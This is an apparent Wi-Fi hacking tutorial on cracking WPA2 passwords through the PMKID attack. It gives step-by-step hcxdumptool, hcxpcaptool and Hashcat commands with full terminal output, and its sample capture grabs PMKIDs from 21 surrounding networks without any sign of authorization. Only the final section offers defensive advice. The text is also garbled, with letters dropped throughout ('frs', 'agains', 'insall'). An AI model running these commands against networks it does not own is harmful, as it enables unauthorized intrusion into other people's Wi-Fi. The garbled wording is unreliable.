Cracking WPA2 Passwords Using the

New PMKID Hashcat Attack

BY KODY  11/10/2018 4:25 AM  02/01/2020 5:07 AM WI-FI HACKING CYBER WEAPONS LAB

Cracking the password for WPA2 networks has been roughly the same for
many years, but a newer attack requires less interaction and info than previous
techniques and has the added advantage of being able to target access points
with no one connected. The lates attack agains the PMKID uses Hashcat to
crack WPA passwords and allows hackers to fnd networks with weak
passwords more easily.

The Old Way to Crack WPA2 Passwords

The old way of cracking WPA2 has been around quite some time and involves
momentarily disconnecting a connected device  from the access point we want
to try to crack. That has two downsides, which are essential for Wi-Fi hackers to
undersand.

The frs downside is the requirement that someone is connected to the network
to attack it. The network password might be weak and very easy to break, but
without a device connected to kick of briefy, there is no opportunity to capture
a handshake, thus no chance to try cracking it.

Don't Miss: Hack WPA & WPA2 Wi-Fi Passwords with a Pixie-Dus

Attack

The second downside of this tactic is that it's noisy and legally troubling in that it
forces you to send packets that deliberately disconnect an authorized user for a
service they are paying to use. This kind of unauthorized interference is
technically a denial-of-service attack and, if susained, is equivalent to jamming
a network. It can get you into trouble and is easily detectable by some of our
previous guides.
A New Method of Password Cracking
Rather than relying on intercepting two-way communications between Wi-Fi
devices to try cracking the password, an attacker can communicate directly with
a vulnerable access point using the new method. On Aug. 4, 2018, a   pos on
the Hashcat forum   detailed a new technique leveraging an attack agains the
RSN IE (Robus Security Network Information Element) of a single EAPOL
frame to capture the needed information to attempt a brute-force attack.

Similar to the previous attacks agains WPA, the attacker mus be in proximity
to the network they wish to attack. The objective will be to use a Kali-compatible
wireless network adapter to capture the information needed from the network to
try brute-forcing the password. Rather than using Aireplay-ng or Aircrack-ng,
we'll be using a new wireless attack tool to do this called hcxtools.

Don't Miss: Select a Field-Tesed Kali Linux Compatible Wireless

Adapter

Using Hcxtools & Hashcat

Hcxdumptool and hcxpcaptool are tools written for Wi-Fi auditing and
penetration tesing, and they allow us to interact with nearby Wi-Fi networks to
capture WPA handshakes and PMKID hashes. It works similar to  Besside-ng in
that it requires minimal arguments to sart an attack from the command line, can
be run agains either specifc targets or targets of convenience, and can be
executed quickly over SSH on a   Raspberry Pi   or another device without a
screen.

Once the PMKID is captured, the next sep is to load the hash into  Hashcat and
attempt to crack the password. This is where hcxtools difers from Besside-ng,
in that a conversion sep is required to prepare the fle for Hashcat. We'll use
hcxpcaptool to convert our PCAPNG fle into one Hashcat can work with,
leaving only the sep of selecting a robus lis of passwords for your brute-
forcing attempts.
 Don't Miss: How to Automate Wi-Fi Hacking with Besside-ng

It's worth mentioning that not every network is vulnerable to this attack.
Because this is an optional feld added by some manufacturers, you should not
expect universal success with this technique. Whether you can capture the
PMKID depends on if the manufacturer of the access point did you the favor of
including an element that includes it, and whether you can crack the captured
PMKID depends on if the underlying password is contained in your brute-force
password lis. If either condition is not met, this attack will fail.
 What You'll Need
To try this attack, you'll need to be running   Kali Linux   and have access to
a  wireless network adapter   that supports monitor mode and packet injection.
We have several guides about selecting a compatible wireless network adapter
below.

Don't Miss: Buy the Bes Wireless Network Adapter for Wi-Fi Hacking

Aside from a   Kali-compatible network adapter , make sure that you've fully
updated and upgraded your sysem. If you don't, some packages can be out of
date and cause issues while capturing.

Recommended: The Alfa AWUS036NHA 2.4 GHz

Step 1 Insall Hxctools & Hashcat

Firs, we'll insall the tools we need. To download them, type the following into a
terminal window.

~# git clone https://github.com/ZerBea/hcxdumptool.git

Cloning into 'hcxdumptool'...

remote: Enumerating objects: 133, done.
remote: Counting objects: 100% (133/133), done.
remote: Compressing objects: 100% (97/97), done.
remote: Total 2127 (delta 82), reused 76 (delta 36), pack-reused 1994
Receiving objects: 100% (2127/2127), 759.53 KiB | 1.79 MiB/s, done.
Resolving deltas: 100% (1434/1434), done.

Then, change into the directory and fnish the insallation with   make  and
then make insall.

~# cd hcxdumptool
 ~/hcxdumptool# make

cc -O3 -Wall -Wextra -std=gnu99 -o hcxpioff hcxpioff.c

cc -O3 -Wall -Wextra -std=gnu99 -o hcxdumptool hcxdumptool.c -lcrypto

~/hcxdumptool# make install

cc -O3 -Wall -Wextra -std=gnu99 -o hcxpioff hcxpioff.c

cc -O3 -Wall -Wextra -std=gnu99 -o hcxdumptool hcxdumptool.c -lcrypto
install -m 0755 -D hcxpioff /usr/local/bin/hcxpioff
install -m 0755 -D hcxdumptool /usr/local/bin/hcxdumptool
rm -f hcxpioff
rm -f hcxdumptool
rm -f *.o *~

When it fnishes insalling, we'll move onto insalling hxctools. To do so, open a
new terminal window or leave the /hexdumptool directory, then insall hxctools.

~/hcxdumptool#cd
~# git clone https://github.com/ZerBea/hcxtools.git

Cloning into 'hcxtools'...

remote: Enumerating objects: 120, done.
remote: Counting objects: 100% (120/120), done.
remote: Compressing objects: 100% (82/82), done.
remote: Total 6196 (delta 77), reused 79 (delta 38), pack-reused 6076
Receiving objects: 100% (6196/6196), 1.89 MiB | 5.02 MiB/s, done.
Resolving deltas: 100% (4320/4320), done.

Next, change into its directory and run   make  and  make insall   like before. If
you get an error, try typing sudo before the command.

~# cd hcxtools
~/hcxtools# make

mkdir -p .deps
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/hcxpcapngtool.d -o
hcxpcapngtool hcxpcapngtool.c -lz -lcrypto
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/hcxhashtool.d -o
hcxhashtool hcxhashtool.c -lcrypto -lcurl
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/hcxpsktool.d -o
hcxpsktool hcxpsktool.c -lcrypto
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/hcxwltool.d -o hcxwltool
hcxwltool.c
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/wlancap2wpasec.d -o
wlancap2wpasec wlancap2wpasec.c -lcurl
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/whoismac.d -o whoismac
whoismac.c -lcurl
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/hcxpmkidtool.d -o
hcxpmkidtool hcxpmkidtool.c -lcrypto -lpthread
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/wlanhcx2john.d -o
 wlanhcx2john wlanhcx2john.c
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/hcxpcaptool.d -o
hcxpcaptool hcxpcaptool.c -lz -lcrypto
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/hcxhashcattool.d -o
hcxhashcattool hcxhashcattool.c -lcrypto -lpthread
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/hcxmactool.d -o
hcxmactool hcxmactool.c
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/hcxessidtool.d -o
hcxessidtool hcxessidtool.c
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/hcxhash2cap.d -o
hcxhash2cap hcxhash2cap.c
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/wlanhc2hcx.d -o
wlanhc2hcx wlanhc2hcx.c
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/wlanwkp2hcx.d -o
wlanwkp2hcx wlanwkp2hcx.c
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/wlanhcxinfo.d -o
wlanhcxinfo wlanhcxinfo.c
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/wlanhcx2ssid.d -o
wlanhcx2ssid wlanhcx2ssid.c
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/wlanhcxcat.d -o
wlanhcxcat wlanhcxcat.c -lcrypto
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/wlanpmk2hcx.d -o
wlanpmk2hcx wlanpmk2hcx.c -lcrypto
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/wlanjohn2hcx.d -o
wlanjohn2hcx wlanjohn2hcx.c
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/wlancow2hcxpmk.d -o
wlancow2hcxpmk wlancow2hcxpmk.c

~/hcxtools# make install

install -m 0755 -D hcxpcapngtool /usr/local/bin/hcxpcapngtool

install -m 0755 -D hcxhashtool /usr/local/bin/hcxhashtool
install -m 0755 -D hcxpsktool /usr/local/bin/hcxpsktool
install -m 0755 -D hcxwltool /usr/local/bin/hcxwltool
install -m 0755 -D wlancap2wpasec /usr/local/bin/wlancap2wpasec
install -m 0755 -D whoismac /usr/local/bin/whoismac
install -m 0755 -D hcxpmkidtool /usr/local/bin/hcxpmkidtool
install -m 0755 -D wlanhcx2john /usr/local/bin/wlanhcx2john
install -m 0755 -D hcxpcaptool /usr/local/bin/hcxpcaptool
install -m 0755 -D hcxhashcattool /usr/local/bin/hcxhashcattool
install -m 0755 -D hcxmactool /usr/local/bin/hcxmactool
install -m 0755 -D hcxessidtool /usr/local/bin/hcxessidtool
install -m 0755 -D hcxhash2cap /usr/local/bin/hcxhash2cap
install -m 0755 -D wlanhc2hcx /usr/local/bin/wlanhc2hcx
install -m 0755 -D wlanwkp2hcx /usr/local/bin/wlanwkp2hcx
install -m 0755 -D wlanhcxinfo /usr/local/bin/wlanhcxinfo
install -m 0755 -D wlanhcx2ssid /usr/local/bin/wlanhcx2ssid
install -m 0755 -D wlanhcxcat /usr/local/bin/wlanhcxcat
install -m 0755 -D wlanpmk2hcx /usr/local/bin/wlanpmk2hcx
install -m 0755 -D wlanjohn2hcx /usr/local/bin/wlanjohn2hcx
install -m 0755 -D wlancow2hcxpmk /usr/local/bin/wlancow2hcxpmk

Finally, we'll need to insall Hashcat, which should be easy, as it's included in
the Kali Linux repo by default. Simply type the following to insall the lates
version of Hashcat.
 ~/hcxtools# cd
~# apt install hashcat

Reading package lists... Done

Building dependency tree
Reading state information... Done
hashcat is already the newest version (5.1.0+ds1-1).
The following packages were automatically installed and are no longer
required:
libdouble-conversion1 liblinear3
Use 'apt autoremove' to remove them.
0 upgraded, 0 newly installed, 0 to remove and 1863 not upgraded.

With this complete, we can move on to setting up the wireless network adapter.

Step 2 Prepare the Wireless Network Adapter

After plugging in your Kali-compatible wireless network adapter, you can fnd
the name by typing  ifconfg or ip a. Typically, it will be named something like
wlan0. The frs sep will be to put the card into wireless monitor mode, allowing
us to lisen in on Wi-Fi trafc in the immediate area.

To do this, type the following command into a terminal window, subsituting the
name of your wireless network adapter for wlan0.

~# airmon-ng start wlan0

Found 3 processes that could cause trouble

Kill them using 'airmon-ng check kill' before putting
the card in monitor mode, they will interfere by changing channels
and sometimes putting the interface back in managed mode

PID Name
555 NetworkManager
611 wpa_supplicant
6636 dhclient

PHY Interface Driver Chipset

phy0 wlan0 ath9k Qualcomm Atheros QCA9565 / AR9565

Wireless Network Adapter (rev 01)

(mac80211 monitor mode vif enabled for [phy0]wlan0 on

[phy0]wlan0mon)
 (mac80211 station mode vif disabled for [phy0]wlan0)
phy1 wlan1 ath9k_htc Atheros Communications, Inc. AR9271
802.11n

Now, your wireless network adapter should have a name like "wlan0mon" and
be in monitor mode. You can confrm this by running  ifconfg again.

Step 3 Use Hxcdump to Capture PMKIDs from Local Networks

Now we are ready to capture the PMKIDs of devices we want to try attacking.
With our wireless network adapter in monitor mode as "wlan1mon," we'll
execute the following command to begin the attack.

~# hcxdumptool -i wlan1mon -o galleria.pcapng --enable__status=1

Breaking this down,   -i  tells the program which interface we are using, in this
case, wlan1mon. The flename we'll be saving the results to can be specifed
with the   -o  fag argument. The channel we want to scan on can be indicated
with the -c fag followed by the number of the channel to scan.

In our command above, we're using wlan1mon to save captured PMKIDs to a

fle called "galleria.pcapng." While you can specify another   satus  value, I
haven't had success capturing with any value except 1.

warning: NetworkManager is running with pid 555

warning: wpa_supplicant is running with pid 611
warning: wlan1mon is probably a monitor interface

start capturing (stop with ctrl+c)

INTERFACE:...............: wlan1mon
FILTERLIST...............: 0 entries
MAC CLIENT...............: fcc233ca8bc5
MAC ACCESS POINT.........: 10ae604b9e82 (incremented on every new
client)
EAPOL TIMEOUT............: 150000
REPLAYCOUNT..............: 62439
ANONCE...................:
d8dd2206c82ad030e843a39e8f99281e215492dbef56f693cd882d4dfcde9956
 [22:17:32 - 001] c8b5adb615ea -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:17:32 - 001] c8b5adb615e9 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:17:33 - 001] 2c95694f3ca0 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:17:33 - 001] 2c95694f3ca0 -> b4b686abc81a [FOUND PMKID]
[22:17:48 - 011] 14edbb9938ea -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:17:48 - 011] 88964e3a8ea0 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:17:49 - 011] dc7fa425888a -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:17:51 - 011] 88964e801fa0 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:17:57 - 001] 9822efc6fdff -> ba634d3eb80d [EAPOL 4/4 - M4 RETRY
ATTACK]
[22:17:57 - 001] 9822efc6fdff -> ba634d3eb80d [FOUND HANDSHAKE AP-LESS,
EAPOL TIMEOUT 6696]
[22:18:04 - 011] 803773defd01 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:19:21 - 011] 14edbb9ba0e6 -> 803773defd01 [FOUND AUTHORIZED
HANDSHAKE, EAPOL TIMEOUT 15247]
[22:19:34 - 006] 0618d629465b -> 58fb8433aac2 [FOUND AUTHORIZED
HANDSHAKE, EAPOL TIMEOUT 2832]
[22:19:42 - 005] e0220203294e -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:19:57 - 011] 14edbb9ba0e6 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:20:02 - 008] 14edbbd29326 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:20:04 - 008] 1c872c707c60 -> 78e7d17791e7 [FOUND PMKID]
[22:20:11 - 009] e0220453a576 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:20:27 - 001] ace2d32602da -> c8665d5dd654 [FOUND HANDSHAKE AP-LESS,
EAPOL TIMEOUT 5202]
INFO: cha=2, rx=32752, rx(dropped)=2801, tx=2205, powned=18, err=0

When you've gathered enough, you can sop the program by typing   Control-
C  to end the attack. This should produce a PCAPNG fle containing the
information we need to attempt a brute-forcing attack, but we will need to
convert it into a format Hashcat can undersand.

Step 4 Use Hxcpcaptool to Convert the Dump for Hashcat

To convert our PCAPNG fle, we'll use hcxpcaptool with a few arguments
specifed. In the same folder that your .PCAPNG fle is saved, run the following
command in a terminal window.

~# hcxpcaptool -E essidlist -I identitylist -U usernamelist -z

galleriaHC.16800 galleria.pcapng

This command is telling hxcpcaptool to use the information included in the fle to
help Hashcat undersand it with the  -E, -I, and -U fags. The -Z fag is used for
 the name of the newly converted fle for Hashcat to use, and the las part of the
command is the PCAPNG fle we want to convert.

Running the command should show us the following.

summary:
--------
file name....................: galleria.pcapng
file type....................: pcapng 1.0
file hardware information....: x86_64
file os information..........: Linux 4.18.0-kali2-amd64
file application information.: hcxdumptool 4.2.1
network type.................: DLT_IEEE802_11_RADIO (127)
endianess....................: little endian
read errors..................: flawless
packets inside...............: 1089
skipped packets..............: 0
packets with GPS data........: 0
packets with FCS.............: 732
beacons (with ESSID inside)..: 49
probe requests...............: 26
probe responses..............: 40
association requests.........: 103
association responses........: 204
reassociation requests.......: 2
reassocaition responses......: 7
authentications (OPEN SYSTEM): 346
authentications (BROADCOM)...: 114
authentications (APPLE)......: 1
EAPOL packets................: 304
EAPOL PMKIDs.................: 21
best handshakes..............: 4 (ap-less: 1)

21 PMKID(s) written to galleriahC.16800

Here, we can see we've gathered 21 PMKIDs in a short amount of time. Now
we can use the "galleriaHC.16800" fle in Hashcat to try cracking network
passwords.

Don't Miss: Protect Yourself from the KRACK Attacks WPA2 Wi-Fi

Vulnerability

Step 5 Select a Password Lis & Brute Force with Hashcat

To sart attacking the hashes we've captured, we'll need to pick a good
password lis. You can fnd several good password liss to get sarted over
at  the SecLis collection . Once you have a password lis, put it in the same
folder as the .16800 fle you jus converted, and then run the following
command in a terminal window.

~# hashcat -m 16800 galleriaHC.16800 -a 0 --kernel-accel=1 -w 4 --force

'topwifipass.txt'

In this command, we are sarting Hashcat in 16800 mode, which is for attacking

WPA-PMKID-PBKDF2 network protocols. Next, we'll specify the name of the
fle we want to crack, in this case, "galleriaHC.16800." The -a fag tells us which
types of attack to use, in this case, a "sraight" attack, and then the  -w  and  --
kernel-accel=1 fags specifes the highes performance workload profle. If your
computer sufers performance issues, you can lower the number in the  -
w argument.

Next, the --force option ignores any warnings to proceed with the attack, and
the las part of the command specifes the password lis we're using to try to
brute force the PMKIDs in our fle, in this case, called "topwifpass.txt."

hashcat (v4.2.1) starting...

OpenCL Platform #1: The pocl project

====================================
* Device #1: pthread-AMD A8-6410 APU with AMD Radeon R5 Graphics,
2553/2553 MB allocatable, 4MCU

Hashes: 21 digests; 21 unique digests, 20 unique salts

Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13

rotates
Rules: 1

Applicable optimizers:
* Zero-Byte
* Slow-Hash-SIMD-LOOP

Minimum password length supported by kernel: 8

Maximum password length supported by kernel: 63

Watchdog: Hardware monitoring interface not found on your system.

Watchdog: Temperature abort trigger disabled.

* Device #1: build_opts '-cl-std=CL1.1 -I OpenCL -I

 /usr/share/hashcat/OpenCL -D VENDOR ID=64 -D CUDA_ARCH=0 -D AMD_ROCM=0 -
D VECT_SIZE=4 -D DEVICE_TYPE=2 -D DGST_R0=0 -D DGST_R1=1 -D DGST_R2=2 -D
DGST_R3=3 -D DGST_ELEM=4 -D KERN_TYPE=16800 -D _unroll'
Dictionary cache hit:

* Filename..: topwifipass.txt
* Passwords.: 4801
* Bytes.....: 45277
* Keyspace..: 4801

[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit =>

Depending on your hardware speed and the size of your password lis, this can
take quite some time to complete. To see the satus at any time, you can press
the S key for an update.

Step 6 Interpret the Results

As Hashcat cracks away, you'll be able to check in as it progresses to see if any
keys have been recovered.

Hash.Type........: WPA-PMKID-PBKDF2
Hash.Target......: galleriaHC.16800
Time.Started.....: Sun Oct 28 22:32:57 2018 (7 mins, 50 secs)
Time.Estimated...: Sun Oct 28 22:57:50 2018 (17 mins, 3 secs)
Guess.Base.......: File (topwifipass.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#1.....: 64 H/s (15.43ms) @ Accel:1 Loops:1024 Thr:1
Vec:4
Recovered........: 0/21 (0.00%) Digests, 0/20 (0.00%) Salts
Progress.........: 30180/96020 (31.43%)
Rejected.........: 0/30180 (0.00%)
Restore.Point....: 1508/4801 (31.41%)
Candidates.#1....: peter123 -> moneyman
HWon.Dev.#1......: N/A

[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit =>

Session..........: hashcat
Status...........: Running
Hash.Type........: WPA-PMKID-PBKDF2
Hash.Target......: galleriaHC.16800
Time.Started.....: Sun Oct 28 22:32:57 2018 (19 mins, 56 secs)
Time.Estimated...: Sun Oct 28 22:57:54 2018 (5 mins, 3 secs)
Guess.Base.......: File (topwifipass.txt)
Guess.Queue......: 1/1 (100.00%)
 Speed.Dev.#1.....: 64 H/s (15.24ms) @ Accel:1 Loops:1024 Thr:1
Vec:4
Recovered........: 0/21 (0.00%) Digests, 0/20 (0.00%) Salts
Progress.........: 76736/96020 (79.92%)
Rejected.........: 0/76736 (0.00%)
Restore.Point....: 3836/4801 (79.90%)
Candidates.#1....: monopoli -> mercenary
HWon.Dev.#1......: N/A

[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit =>

When the password lis is getting close to the end, Hashcat will automatically
adjus the workload and give you a fnal report when it's complete.

Approaching final keyspace - workload adjusted.

Session..........: hashcat
Status...........: Exhausted
Hash.Type........: WPA-PMKID-PBKDF2
Hash.Target......: hotspotcap.16800
Time.Started.....: Sun Oct 28 18:05:57 2018 (3 mins, 49 secs)
Time.Estimated...: Sun Oct 28 18:09:46 2018 (0 secs)
Guess.Base.......: File (topwifipass.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#1.....: 42 H/s (15.56ms) @ Accel:1 Loops:1024 Thr:1
Vec:4
Recovered........: 0/2 (0.00%) Digests, 0/2 (0.00%) Salts
Progress.........: 9602/9602 (100.0%)
Rejected.........: 2/9602 (0.02%)
Restore.Point....: 4801/4801 (100.0%)
Candidates.#1....: 159159159 -> 00001111
HWon.Dev.#1......: N/A

Started: Sun Oct 28 18:05:56 2018

Stopped: Sun Oct 28 18:09:49 2018

If you've managed to crack any passwords, you'll see them here. In our tes run,
none of the PMKIDs we gathered contained passwords in our password lis,
thus we were unable to crack any of the hashes. This will mos likely be your
result too agains any networks with a srong password but expect to see results
here for networks using a weak password.

The PMKID Hashcat Attack Makes Wi-Fi Attacks Easier

While the new attack agains Wi-Fi passwords makes it easier for hackers to
attempt an attack on a target, the same methods that were efective agains
previous types of WPA cracking remain efective. If your network doesn't even
support the robus security element containing the PMKID, this attack has no
chance of success. You can audit your own network with hcxtools to see if it is
susceptible to this attack.

Even if your network is vulnerable,  a srong password   is sill the bes defense
agains an attacker gaining access to your Wi-Fi network using this or another
password cracking attack.

Because these attacks rely on guessing the password the Wi-Fi network is
using, there are two common sources of guesses; The frs is users
picking  default or outrageously bad passwords , such as "12345678" or
"password." These will be easily cracked. The second source of password
guesses comes from data breaches that  reveal millions of real user passwords .
Because many users will reuse passwords between diferent types of accounts,
these liss tend to be very efective at cracking Wi-Fi networks.

I hope you enjoyed this guide to the new PMKID-based Hashcat attack on
WPA2 passwords! If you have any quesions about this tutorial on Wi-Fi
password cracking or you have a comment, feel free to reach me on
Twitter @KodyKinzie.